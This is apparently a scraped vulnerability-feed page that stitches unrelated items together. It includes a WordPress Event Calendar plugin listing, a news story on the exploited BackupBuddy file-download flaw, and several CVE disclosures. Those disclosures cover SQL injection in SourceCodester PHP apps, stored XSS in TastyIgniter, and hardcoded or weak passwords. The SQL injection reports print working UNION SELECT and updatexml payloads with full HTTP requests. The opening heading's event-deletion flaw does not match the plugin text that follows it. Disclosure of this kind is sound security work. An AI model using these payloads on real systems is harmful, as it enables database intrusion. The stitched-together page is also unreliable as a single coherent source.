Unauthenticated Event Deletion vulnerability in Totalsoft Event Calendar – Calendar plugin <= 1.4.6 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Event Calendar is a flexible calendar plugin that allows you to connect to your database and show up your event days on a view. Calendar can render a Day, Week, Month and Resource calendar view. The also provides an interface for manipulating and formatting dates and times. Each event box has a link to the original event you defined in your calendar.

*   Event Calendar Premium
*   All Calendar Demo Types
*   Event Calendar FAQ
*   Event Calendar User Manual
*   Support Forum

**Features**

*   Plugin for create a calendar with events.
*   Intuitive event labels.
*   Easy to customize.
*   Use as a date picker or a full fledged calendar.
*   10 free themes with the option of select data ranges, mark events and others (4 versions of the event calendar type, 2 versions of the simple type, 2 versions of the flexible type and 2 versions of the timeline type)
*   You can easily list your events on wherever you want on your page via shortcodes.
*   Each event box has a link to the original event you defined in your calendar.
*   Allows you to set the most appropriate navigation arrows, which will suit the best for your web site.
*   The ability to display multiple events for a single day.
*   Plugin lets you change the color and set it to the colors of your site.
*   You can change the start and end date of the event.
*   You can change the start and end time of events.
*   You can customize the calendar color, font size and font family.
*   The ability to change the color of the arrow and background color.
*   Each species has a unique customizable settings.
*   Add an unlimited number of events in one calendar. As you have already created a number of events, you can add via the shortcodes on your page as you need.
*   Each calendar can be inserted in a page, post or widget shortcode.
*   You can add photos to the events (all types)
*   Total Calendar, Timeline, Crazy, Schedule and Full Year types each event has its own color.
*   Recurring events
*   Possibility to preview the theme in calendar before putting it on the page.

**Premium version adds**

*   3 beautiful customizable themes
*   Crazy Calendar Theme
*   Schedule Theme
*   Full Year Calendar Theme
*   **Recurring events** – Daily, Weekly, Monthly, Yearly
*   **WeekDay Start** – Can select that day, which must be the first in the week.
*   **Weekday** – Ability to select the style of calendar week.
*   **Todays numbers Color** – Can choose the date color, that will be displayed.
*   **Icon** – Possibility select the right and the left icons, which are, for change the months by sequence.
*   **Color** – The plugin allows to change the color and enter it in the colors of your site.
*   **Font** – The plugin allows to change the color of the date, font size and font family.
*   This opens up new useful functions and new possibilities.

**In addition to the features mentioned above, there are many other functions inside the plugin. You get the advantage of an intuitive user interface, that makes the plugin operation easy, easy to understand the calendar options, as well as many hooks and filters to control the output.**

**Main features of Event.**

*   **Event Title** – You can give a name for event.
*   **Calendar Name** – Choose that version of themes, in which you want to see the Events.
*   **Start Date** – You Can select the start of the event (To display events in the calendar if you have a browser Safari, firefox or Internet explorer should write yyyy-mm-dd).
*   **End Date** – You Can select the finish date of the event (To display events if you have a browser Safari, firefox or Internet explorer should write yyyy-mm-dd).
*   **Event URL** – You can set external URL, which should be included in the event.
*   Open in new tab – Choose, by clicking on the link should open in new tab or not.
*   **Start Time (Required field)** – Can select the event start time (To display events in the calendar if you have a browser Safari, Firefox or Internet explorer should write hh:mm).
*   **End Time (Required field)** – Can select the event end time (To display events if you have a browser Safari, Firefox or Internet explorer should write hh:mm).
*   **Event color** – Select that color, which you want to see for your event, which shows in the calendar (Event Color option is only for Event Calendar Type.).
*   **Description** – You can give a description for event.
*   **Event Image/Video** – You can give a Image and Video(YouTube and Vimeo) for event. Event Image and Video option is available for all types.

**Insert plugin to the WordPress page, post, widget** – Every calendar could be inserted into a page, post or widget with shortcode.

**Plugin works in Chrome, Safari, Opera, Firefox, Internet Explorer** – Use your calendar with all the popular browsers.

**Navigation Arrow** – Plugin allows you to get the most suitable navigation arrows that fit best for your website.

**The Plugin is Truly Wonderful** – You can create a very nice and beautiful calendar for your website. The plugin is easily editable and functionality perfectly.

**Link** – There is a special place for adding a Link to each event. Choose to open the Link in the new tab or not.

**Technical Support**

*   If you notice any errors or have any questions with our event calendar, you can notify us. We will investigate and solve the problem. Check out the Event Calendar Support Forum on our website. If you don’t find a solution to your question here, don’t hesitate to click here to contact us.

THANK YOU FOR YOUR INTEREST IN EVENT CALENDAR TS.

Here’s how you install and activate the Event Calendars plugin:

Download the plugin.  
Upload the .zip file in your WordPress plugin directory.  
Activate the plugin from the “Plugins” menu in WordPress.  
After activating Event Calendar, choose the type of version you wish to use.

For users of MAC

*   Go to the downloads folder and local the folder with the event calendar.
*   Right click on the folder and select Compress. Now you have just created the .zip file, which can be installed as described here.
*   Click the download and install button to download and install the plugin.
*   Click the Activate plugin button to activate the calendar plugin.
*   If the installation is succeeded, you will see a message in the image.
*   In case of any problems during the installation of the calendar, please click here to contact us.

**1). There are some restrictions for adding events?**

*   There is no limit for the amount of events.
*   You can add as many events as you want. Plugin has no limitations.

**2.) How many calendar may I create for WordPress website?**

*   You may create unlimited calendars by this plugin and by many options.

**3.) How to change the font size of the theme?**

*   The settings can include custom header settings where you can adjust the font size and see the results in the live preview.

**4.) How can I add plugin in widget?**

*   Get to the widget, then add our plugin widget to the sidebar. Then select your name.

**5.) How many themes can I create for my plugin?**

*   You can create as many themes as you want.

**6.) \*\*\*\* Where to change the settings?**

*   The settings you can change in the manager’s calendar.

**7.) I create an event in the calendar but it does not show. What can I do?**

*   First, check that you don’t have the same plugin again.
*   It is necessary to write the begging and ending day of the event.
*   If you have Safari, Firefox, Opera or Internet Explorer, you must write yyyy-mm-dd , that would show the events in calendar.

**8). How many calendar themes can I create for my plugin?**

*   You can create as many themes as you want.

**9.) How many event can I create for my plugin?**

*   You can create as many events as you need.

**10.) Has each event own color or color is for everyone in Simple Type?**

*   In this version you are setting events color in general options and its for all events. In Total Calendar and Timeline types each event has its own color.

**11.) How to change date format?**

*   If you need to change event date format, please open Event Manager Settings and type necessary type in Date format input. For instance, in case you want to have dates as 08/1/2020, set the format to M/d/Y.

awesomeness in this calendar

I bought the full version. After installing on my template, not everything was fine, but the support from the developer was great / fast. The calendar fully suits me both in terms of features and usability bars - on pages or widgets. So far, I am very satisfied.

In my case I needed a yearly calendar. It is the plugin that I was looking for. Functional, easy to use, cheap ... In addition, the customer service is incredible. I definitely recommend it.

This plugin is all I need for a simple event calendar with no bells and whistles. Had some issues in the beginning with the backend but support fixed them quickly and released an updated version. The only issues I have now, I have with all free plugins. They all seem to think it is okay to bombard us with promotions to upgrade to pro. If that is what we wanted we would have done this once we confirmed the plugin was well structured and we could use the added features. Why not allow us to remove the promos forever? After all there is a link to your page inside the plugin itself if we change our minds later.

We had a Problem with the Size of the Date for one Calendar Type, because we wanted it to be different from the headline of one event, so we contacted the Support. It was really really fast and help us out as fast as possible. They even changed the code for us so we got what we wanted. I never saw that Developer made a change for one single user. Its awesome Service in my opinion! I would recommend this plugin again, if you want to use a simple but clear calendar plugin for wordpress.

Read all 98 reviews

“Event Calendar – Calendar” is open source software. The following people have contributed to this plugin.

Contributors

*    totalsoft

**Version 1.4.8**

*   Changed TS Poll plugin banner

**Version 1.4.7**

*   Fixed a bug in the plugin.

**Version 1.4.6**

*   Fixed issue with theme options.

**Version 1.4.5**

*   Fixed bug with admin panel.

**Version 1.4.4**

*   Added the ability to change the icon to events.
*   Changed several fonts.
*   Fixed bugs related to PHP 8 version.

**Version 1.4.3**

*   Fixed bug in “update” functions.

**Version 1.4.2**

*   Fixed bug in “edit” functions.

**Version 1.4.1**

*   Changed function for font size.
*   Fixed issue in events option.

**Version 1.4.0**

*   Fixed a bug for showing the event.

**Version 1.3.9**

*   Added font for days on the calendar.
*   Fixed bug related icons.

**Version 1.3.8**

*   Added the ability to put days on the center.

**Version 1.3.7**

*   Added the ability to select icons back to the calendar after the event.

**Version 1.3.6**

*   Fixed a bug in the Timeline type. After changing the language this type was did not work.

**Version 1.3.5**

*   Added a new opportunity in the timeline version. Shows the current days at first.
*   Fixed a bug in the flexible version. The start and the end of days in the event, showed only the starting day.
*   Fixed a bug in the Timeline version. When the year did not had any event it do not show the next year�s events.

**Version 1.3.4**

*   The bug in the “Total Soft Calendar” version has been fixed. The description is not shown in the calendar.
*   Fixed a bug with recurring events.

**Version 1.3.3**

*   Added possibility to preview the theme in calendar before putting it on the page.
*   Updated translations.
*   Changed admin menu design.

**Version 1.3.2**

*   Added Google fonts to the basic fonts.
*   Added possibility to make recurring events.
*   Added box shadow options for all types.
*   Fixed bug with media uploading process.

**Version 1.3.1**

*   Updated function for creating Simple type.

**Version 1.3.0**

*   Changed Media uploading function.
*   Changed admin menu style.
*   Added languages for Timeline type.
*   Changed function for constructing Timeline calendar.

**Version 1.2.9**

*   Changed CSS style for Flexible Calendar type.
*   Updated uploading function for videos and images.
*   Changed Basic function for creating Timeline Calendar.

**Version 1.2.8**

*   Fixed bug In Flexible Calendar type (Did not show the year in the calendar).
*   Changed all functions for creating calendar.
*   Updated the function for creating the events by ordering.

**Version 1.2.7**

*   Fixed PHP error in widget.

**Version 1.2.6**

*   Fixed a bug in the widget.

**Version 1.2.5**

*   Added new Type of calendar: ” Timeline Calendar “
*   Opened some functions for free version.

**Version 1.2.4**

*   Added possibility to create more than one flexible Calendar on the same page.

**Version 1.2.3**

*   Added Secondary question for deleting calendar or events.

**Version 1.2.2**

*   Added new text editor for making event description.

**Version 1.2.1**

*   In Category ” Total Products ” added new plugin ” Event Calendars ” by Total-Soft.

**Version 1.2.0**

*   Modified the Design Admin Panel.

**Version 1.1.9**

*   Added possibility to create more than one Simple Calendar on the same page.

**Version 1.1.8**

*   Tested with WP version 4.7.3.

**Version 1.1.7**

*   Added a function into the first and second versions. You can add descriptions, pictures, videos and choose time format.

**Version 1.1.6**

*   Added a new color picker type.
*   Opened some functions for free version.

**Version 1.1.5**

*   Added translations in several languages for the month names and weekday names.
*   Fixed bug in Flexible Calendar type with translation.

**Version 1.1.4**

*   Added new menu in the plugin.

**Version 1.1.3**

*   Fixed bugs in the 3 calendar types.

**Version 1.1.2**

*   Added new Calendar Type “Flexible Calendar” in which you can add events with images and videos from YouTube and Vimeo.

**Version 1.1.1**

*   Added Italian translation.

**Version 1.1.0**

*   Fixed a bug with icons.

**Version 1.0.8**

*   Issue with date format solved

**Version 1.0.7**

*   Fixed a problem with the widget

**Version 1.0.6**

*   Added new Type of calendar: ” Simple Calendar “

**Version 1.0.5**

*   Changed in the Admin panel
*   Added educational text for the users how to adjust the calendar

**Version 1.0.4**

*   Fixed Syntax Error

**Version 1.0.3**

*   Changed free version some parameters

**Version 1.0.2**

*   Fixed a bug in the event

**Version 1.0.1**

*   Fixed a little bug that was affecting some users

**Version 1.0.0**

*   Initial Version Release

CVE-2022-38067: Event Calendar – Calendar

A zero-day flaw in a WordPress plugin called BackupBuddy is being actively exploited, WordPress security company Wordfence has disclosed.
"This vulnerability makes it possible for unauthenticated users to download arbitrary files from the affected site which can include sensitive information," it said.
BackupBuddy allows users to back up their entire WordPress installation from within the

A zero-day flaw in a WordPress plugin called BackupBuddy is being actively exploited, WordPress security company Wordfence has disclosed.

"This vulnerability makes it possible for unauthenticated users to download arbitrary files from the affected site which can include sensitive information," it said.

BackupBuddy allows users to back up their entire WordPress installation from within the dashboard, including theme files, pages, posts, widgets, users, and media files, among others.

The plugin is estimated to have around 140,000 active installations, with the flaw (CVE-2022-31474, CVSS score: 7.5) affecting versions 8.5.8.0 to 8.7.4.1. It's been addressed in version 8.7.5 released on September 2, 2022.

The issue is rooted in the function called "Local Directory Copy" that's designed to store a local copy of the backups. According to Wordfence, the vulnerability is the result of the insecure implementation, which enables an unauthenticated threat actor to download any arbitrary file on the server.

Additional details about the flaw have been withheld in light of active in-the-wild abuse and its ease of exploitation.

"This vulnerability could allow an attacker to view the contents of any file on your server that can be read by your WordPress installation," the plugin's developer, iThemes, said. "This could include the WordPress wp-config.php file and, depending on your server setup, sensitive files like /etc/passwd."

Wordfence noted that the targeting of CVE-2022-31474 commenced on August 26, 2022, and that it has blocked nearly five million attacks in the intervening time period. Most of the intrusions have attempted to read the below files -

*   /etc/passwd
*   /wp-config.php
*   .my.cnf
*   .accesshash

Users of the BackupBuddy plugin are advised to upgrade to the latest version. Should users determine that they may have been compromised, it's recommended to reset the database password, change WordPress Salts, and rotate API keys stored in wp-config.php.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Exploit Zero-Day in WordPress BackupBuddy Plugin in ~5 Million Attempts

School Activity Updates with SMS Notification v1.0 was discovered to contain a SQL injection vulnerability via the component /modules/modstudent/index.php?view=edit&id=.

**School Activity Updates with SMS Notification v1.0 by janobe has SQL injection**

BUG\_Author: Moye

Login account: admin/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/13799/school-activity-updates-sms-notification-phppdo.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /activity/admin/modules/modstudent/index.php?view=edit&id=

Vulnerability location: /activity/admin/modules/modstudent/index.php?view=edit&id=, id

dbname =db\_wvsu

\[+\] Payload: /activity/admin/modules/modstudent/index.php?view=edit&id=-201806%27%20union%20select%201,2,database(),4,5,6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /activity/admin/modules/modstudent/index.php?view\=edit&id\=\-201806%27%20union%20select%201,2,database(),4,5,6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

CVE-2022-38269: bug_report/SQLi-2.md at main · moyess/bug_report

School Activity Updates with SMS Notification v1.0 was discovered to contain a SQL injection vulnerability via the component /modules/autonumber/index.php?view=edit&id=.

**School Activity Updates with SMS Notification v1.0 by janobe has SQL injection**

BUG\_Author: Moye

Login account: admin/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/13799/school-activity-updates-sms-notification-phppdo.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /activity/admin/modules/autonumber/index.php?view=edit&id=

Vulnerability location: /activity/admin/modules/autonumber/index.php?view=edit&id=, id

dbname =db\_wvsu

\[+\] Payload: /activity/admin/modules/autonumber/index.php?view=edit&id=-1%27%20union%20select%201,database(),3,4,5--+ // Leak place ---> id

GET /activity/admin/modules/autonumber/index.php?view\=edit&id\=\-1%27%20union%20select%201,database(),3,4,5\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

CVE-2022-38268: bug_report/SQLi-3.md at main · moyess/bug_report

School Activity Updates with SMS Notification v1.0 was discovered to contain a SQL injection vulnerability via the component /modules/user/index.php?view=edit&id=.

**School Activity Updates with SMS Notification v1.0 by janobe has SQL injection**

BUG\_Author: Moye

Login account: admin/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/13799/school-activity-updates-sms-notification-phppdo.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /activity/admin/modules/user/index.php?view=edit&id=

Vulnerability location: /activity/admin/modules/user/index.php?view=edit&id=, id

dbname =db\_wvsu

\[+\] Payload: /activity/admin/modules/user/index.php?view=edit&id=-4%27%20union%20select%201,database(),3,4,5--+ // Leak place ---> id

GET /activity/admin/modules/user/index.php?view\=edit&id\=\-4%27%20union%20select%201,database(),3,4,5\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

CVE-2022-38267: bug_report/SQLi-1.md at main · moyess/bug_report

Apartment Visitor Management System v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter at /avms/edit-apartment.php.

Permalink

**Apartment Visitor Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: xxxcoll

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php-apartment-visitor-management-system-source-code

The program is built using the xmapp-php8.1 version

Vulnerability File: /avms/edit-apartment.php?editid=

Vulnerability location: /avms/edit-apartment.php?editid=, editid

dbname =avms\_db

\[+\] Payload: /avms/edit-apartment.php?editid=-20%27%20union%20select%201,database(),3,4--+ // Leak place ---> editid

GET /avms/edit\-apartment.php?editid\=\-20%27%20union%20select%201,database(),3,4\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=fjhrjdpuej6edqv5haoadpj3lc
Connection: close

CVE-2022-38265: bug_report/SQLi-1.md at main · xxxcoll/bug_report

TastyIgniter v3.5.0 was discovered to contain a cross-site scripting (XSS) vulnerability which allows attackers to execute arbitrary web scripts or HTML via a crafted payload.

Vendor

Product

TastyIgniter

Affected Version(s)

3.5.0 and probably prior

Tested Version(s)

3.5.0

Vendor Notification

13 June 2022

Advisory Publication

13 June 2022 \[without technical details\]

Vendor Fix

N/A

Public Disclosure

13 June 2022

Latest Modification

09 June 2022

CVE Identifier

Pending

Product Description

A free online ordering system for restaurants & takeaways based on Laravel PHP Framework.

Credits

Oswaldo Morales Rodríguez Security Researcher & Penetration Tester @wizlynx group

**Stored XSS**

**Severity**: **Medium**

**CVSS Score**: 5.4

**CWE-ID**: CWE-79

**Status**: Open

**Vulnerability Description**

TastyIgniter is affected by Stored Cross-Site Scripting (XSS) vulnerability affecting version 3.5.0. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content. The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

**CVSS Base Score**

**Attack Vector**

Network

**Scope**

Changed

**Attack Complexity**

Low

**Confidentiality Impact**

Low

**Privileges Required**

Low

**Integrity Impact**

Low

**User Interaction**

Required

**Availability Impact**

None

Full details about the vulnerability will be disclosed once the vendor has provided a patch.

Top

CVE-2022-38256: wizlynx group | Stored Cross-Site Scripting (XSS) Vulnerability in TastyIgniter v3.5.0

Interview Management System v1.0 was discovered to contain a SQL injection vulnerability via the component /interview/delete.php?action=questiondelete&id=.

**Interview Management System v1.0 by janobe has SQL injection**

BUG\_Author: Fright-Moch

Login account: janobe@janobe.com/janobe (Super Admin account)

vendors: https://www.sourcecodester.com/php/14585/interview-management-system-phpmysqli-full-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /interview/delete.php?action=questiondelete&id=

Vulnerability location: /interview/delete.php?action=questiondelete&id=, id

dbname =sourcecodester\_interviewdb

\[+\] Payload: /interview/delete.php?action=questiondelete&id=(updatexml(1,concat(0x7e,(select%20database()),0x7e),0)) // Leak place ---> id

GET /interview/delete.php?action\=questiondelete&id\=(updatexml(1,concat(0x7e,(select%20database()),0x7e),0)) HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=fjhrjdpuej6edqv5haoadpj3lc
Connection: close

CVE-2022-38260: bug_report/SQLi-2.md at main · Fright1Moch/bug_report

bilde2910 Hauk v1.6.1 requires a hardcoded password which by default is blank. This hardcoded password is hashed but stored within the config.php file server-side as well as in clear-text on the android client device by default.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-37857: Two minor Security Issues · Issue #187 · bilde2910/Hauk

Bminusl IHateToBudget v1.5.7 employs a weak password policy which allows attackers to potentially gain unauthorized access to the application via brute-force attacks. Additionally, user passwords are hashed without a salt or pepper making it much easier for tools like hashcat to crack the hashes.

*   CVE-2022-37857
*   Affected product and version: Hauk version 1.6.1
*   Problem Type: Weak Password Policy and hardcoded credentials
*   Description: Hauk v1.6.1 requires a hardcoded password which by default is blank. This hardcoded password is hashed but stored within the config.php file server-side as well as in clear-text on the android client device by default.

*   CVE-2022-37163
*   Affected Product and version: IHateToBudget version 1.5.7
*   Problem Type: Weak Password Policy and Use of Password Hash with Insufficient Computational Effort
*   Description: IHateToBudget v1.5.7 employs a weak password policy which allows attackers to potentially gain unauthorized access to the application via brute-force attacks. Additionally, user passwords are hashed without a salt or pepper making it much easier for tools like hashcat to crack the hashes.

*   CVE-2022-37164
*   Affected product and version: OnTrack version 3.4
*   Problem Type: Weak Password Policy and Use of Password Hash with Insufficient Computational Effort
*   Description: OnTrack v3.4 employs a weak password policy which allows attackers to potentially gain unauthorized access to the application via brute-force attacks. Additionally, user passwords are hashed without a salt or pepper making it much easier for tools like hashcat to crack the hashes.

So I ran into an interesting issue with a self-hosted location sharing service that includes a android client available on F-Droid and the Play Store.

I reached out to the developer talking about the Janus vulnerability although I think that his response was totally legitimate. Which you can read about HERE.

If you’re interested in the Janus vulnerability, check more information about it HERE!

Regardless what I decided to pursue and report was the fact that credentials are hardcoded HERE, although of course you need to replace config-sample.php to config.php.

So the developer was professional and didn’t have real push back but their choice was to leave the password requirements/hardcoded credential requirement to the administrator.

Even though I completely understand it, I wanted to let those that rely on this server/client know.

That is where CVE-2022-37857 comes from!

Following that path, the OnTrack application found HERE was also vulnerable and assigned CVE-2022-37164

Lastly the same issue was found in the IHateToBudget application found HERE and was assigned CVE-2022-37163

Hope its helpful!

END TRANSMISSION

**Published** August 7, 2022August 26, 2022

**Post navigation**

Tag

#php